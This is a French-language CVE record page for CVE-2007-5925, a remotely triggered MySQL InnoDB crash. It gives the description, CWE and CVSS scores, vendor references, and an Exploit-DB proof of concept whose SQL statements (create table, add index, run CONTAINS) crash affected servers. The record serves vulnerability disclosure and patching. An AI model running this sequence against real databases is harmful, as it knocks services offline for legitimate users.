CVE-2007-5925 : Détail

CVE-2007-5925

A03-Injection
9.74%V3
Network
2007-11-10
01h00 +00:00
2018-10-03
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 30744

Date de publication : 2007-11-04 23h00 +00:00
Auteur : Joe Gallo
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/26353/info MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. This issue affects MySQL 5.1.23 and prior versions. mysql> CREATE TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Query OK, 0 rows affected mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); Empty set mysql> ALTER TABLE test ADD INDEX (foo(100)); Query OK, 0 rows affected Records: 0 Duplicates: 0 Warnings: 0 mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');

Products Mentioned

Configuraton 0

Mysql>>Mysql >> Version To (including) 5.1.23_bk

Références

http://secunia.com/advisories/27823
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/USN-1397-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-200711-25.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2007/3903
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/27649
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1018978
Tags : vdb-entry, x_refsource_SECTRACK
https://usn.ubuntu.com/559-1/
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.debian.org/security/2007/dsa-1413
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/28040
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2007-1157.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/28099
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/26353
Tags : vdb-entry, x_refsource_BID
http://www.redhat.com/support/errata/RHSA-2007-1155.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/28108
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28025
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28838
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28128
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2007:243
Tags : vendor-advisory, x_refsource_MANDRIVA
http://bugs.mysql.com/bug.php?id=32125
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/27568
Tags : third-party-advisory, x_refsource_SECUNIA